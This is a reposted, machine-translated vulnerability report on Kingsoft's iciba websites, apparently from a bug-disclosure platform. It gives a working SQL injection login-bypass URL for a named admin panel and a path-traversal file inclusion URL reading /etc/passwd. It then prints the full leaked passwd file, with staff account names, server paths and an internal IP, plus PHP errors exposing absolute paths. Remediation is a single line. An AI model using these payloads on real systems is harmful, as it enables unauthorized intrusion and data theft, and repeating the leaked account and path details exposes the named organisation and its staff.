Kingsoft injection + local File Inclusion Vulnerability + absolute path Leakage

Source: Internet
Author: User
Tags gopher

ICIBA information background management system login box SQL Injection
Http://news.iciba.com/admin/index.php? Mod = login & act = ajaxlogin & username = 'or ''='' or ''=' & pwd = 'or'' = ''or'' ='
Http://news.iciba.com/admin/index.php
 





Solution: filter parameters




 

Kingsoft's local File Inclusion Vulnerability + absolute path leakage (in fact, it is the same). It has been confirmed that the require_once () function is used, but I cannot find an upload point for half a day, so we didn't proceed.
Detailed Description: files include: http://sl.iciba.com/rss.php? Rtype =.../etc/passwd % 00


Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
News: x: 9: 13: news:/etc/news:
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Netdump: x: 34: 34: Network Crash Dump user:/var/crash:/bin/bash
Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 4294967294: 4294967294: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin
Pegasus: x: 66: 65: tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
Htt: x: 100: 101: IIIMF Htt:/usr/lib64/im:/sbin/nologin
Www: x: 48: 48:/data/app:/bin/bash
Mysql: x: 512: 512:/home/mysql:/bin/bash
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Oscar: x: 518: 519:/data/app/Oscar:/bin/bash
Vote_www: x: 519: 520:/data/app/vote.www.iciba.com:/bin/bash
Nagios: x: 101: 102: nagios:/var/log/nagios:/bin/sh
Icibaweb: x: 520: 521:/data/app/192.168.0.14/news.iciba.com/:/sbin/nologin
Huangjin: x: 525: 48:/data/app/wap.iciba.com/wwwroot:/bin/bash
Ciba_duanjing: x: 522: 48:/data/app/wap.iciba.com/wwwroot:/sbin/nologin
Survey: x: 528: 48:/data/apps/wap.iciba.com/iciba_wap/ef_survey:/sbin/nologin
Cibayw: x: 530: 530:/home/cibayw:/bin/bash
Changjf: x: 533: 533:/data/app/wap.iciba.com/:/sbin/nologin
Jinqifa: x: 535: 535:/home/jinqifa:/bin/bash
Linshi: x: 536: 536:/opt/kingsoft/sbin/data/baknslicba:/bin/bash
Vuser: x: 537: 537:/data/app/192.168.0.14/news.iciba.com/test:/bin/bash
Zouyang: x: 538: 538:/data/app/sl.iciba.com/wwwroot/:/bin/bash
Xueni: x: 539: 539:/home/xueni:/bin/bash
<Br/>
<B> Notice </B>: Undefined variable: rss_title in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 19 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_link in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 20 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_desc in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 21 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_language in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 23 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_pubDate in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 23 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_pubDate in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 24 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rssData in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 26 </B> <br/>
<Br/>
<B> Warning </B>: Invalid argument supplied for foreach () in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 26 </B> <br/>
<? Xml version = "1.0" encoding = "UTF-8"?>
<Rss xmlns: xsd = "http://www.w3.org/2001/XMLSchema" xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns: trackback = "http://madskills.com/public/xml/rss/module/trackback/" xmlns: wfw = "http://wellformedweb.org/CommentAPI/" xmlns: dc = "http://purl.org/dc/elements/1.1/" version = "2.0">
<Channel>
<Title> <! [CDATA []> </title>
<Link> <! [CDATA []> </link>
<Description> <! [CDATA []> </description>
<Language> </language>
<PubDate> </pubDate>
<LastBuildDate> </channel> </rss>
 








Solution:

Filter more externally submitted data


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.